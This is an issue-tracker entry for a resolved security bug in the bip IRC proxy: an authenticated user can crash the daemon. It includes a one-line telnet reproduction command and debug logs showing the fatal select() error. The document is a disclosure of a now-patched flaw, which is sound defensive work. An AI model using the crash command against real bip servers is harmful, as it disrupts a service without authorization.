Project

General

Profile

Actions

Bug #432

closed

authenticated bip users could stop bip daemon

Added by Pierre-Louis Bonicoli over 9 years ago. Updated over 2 years ago.

Status:
Resolved
Priority:
Normal
Target version:
Start date:
2015-01-15
Due date:
% Done:

100%

Estimated time:
Patch Available:
Yes
Found in Versions:
Confirmed:
Yes
Branch:
Security:
Yes
Help Needed:

Description

Fran found that these commands allow an authenticated bip user to stop bip daemon:

{ echo PASS bipnick:mysecretpassword:freenode; echo NICK Pilou; echo USER Pilou 0 Pilou :blah; sleep 2; } | telnet 127.0.0.1 7778 | read

15-01-2015 04:26:44 DEBUG: Trying to accept new client on 0
15-01-2015 04:26:44 DEBUG: New client on socket 41 !
15-01-2015 04:26:44 DEBUG: fd:41 Connection established !
15-01-2015 04:26:44 DEBUG: "PASS bipnick:mysecretpassword:freenode" 
15-01-2015 04:26:44 DEBUG: "NICK Pilou" 
15-01-2015 04:26:44 DEBUG: "USER Pilou 0 Pilou :blah" 
15-01-2015 04:26:44 DEBUG: Connection close asked. FD:41
15-01-2015 04:26:44 DEBUG: A client connected
15-01-2015 04:26:44 FATAL: select(): Bad file descriptor

Files

patch (3.8 KB) patch Pierre-Louis Bonicoli, 2015-01-16 07:19
Actions

Also available in: Atom PDF